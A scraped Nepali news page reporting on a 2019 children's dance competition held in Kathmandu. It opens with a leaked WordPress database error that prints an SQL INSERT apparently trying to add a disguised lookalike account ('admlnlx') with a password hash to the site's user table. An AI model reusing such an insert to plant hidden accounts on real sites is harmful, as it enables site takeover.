WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bdq6Ma04D.z4qKn.5vrEHKoyAp/pIr0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 13:56:45', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, कामना कला केन्द्रको आयोजनामा “कामना लिट्टिल डान्स च्याम्पियन २०१९” भब्यातका साथ सम्पन्न भएको छ ।
गौशलाका स्थित नेपाल संगीत विद्यालयमा शनिवार सम्पन्न कार्यक्रममा ३७ जना प्रतियोगि मध्येबाट २१ जना फाइनल राउण्डमा पुगेका थिए ।
उक्त प्रतियोगिताबाट “कामना लिट्टल डान्स च्याम्पियन २०१९” को उपाधी लक्की शेर्पाले चुम्न सफल भए । शेर्पाले नगद १० हजार सहित ट्रफी प्राप्त गरेकी छन् । फस्ट रनरअप र सेकेण्ड रनरअप आयुप तामाङ र कृतिका सुनुवार भएका छन् । उनीहरुले क्रमशः नगद ७ हजार र ५ हजार नगदसहित ट्रफी प्राप्त गरे । फाइनलमा प्रतिस्पर्धी वांकी १८ जनाले पनि विभिन्न अवार्ड जितेका थिए ।
प्रतियोगितामा कक्षा प्ले–ग्रुपदेखि कक्षा ४ सम्म अध्ययनरत विह्द्यार्थिहरुबाट अडिसन राउण्ड, मेगा राउण्ड, थियटर राउण्ड सुपर सेमी राउण्ड, टप सेलेक्टेड राउण्ड हुँदै अत्यन्तै प्रतिभावान् ३७ जना विधार्थिहरु सेमीफाइनलसम्म पुगेको कामना कला केन्द्रका अध्यक्ष नृत्य निर्देशक भुवन श्रेष्ठ बताए ।
प्रतियोगितामा काठमाण्डौ भित्रका ३८ विद्यालयका १ हजार २ सय जना विद्यार्थीहरुको सहभागिता रहेको कार्यक्रम संयोजक केशव कोइरालाले बताए ।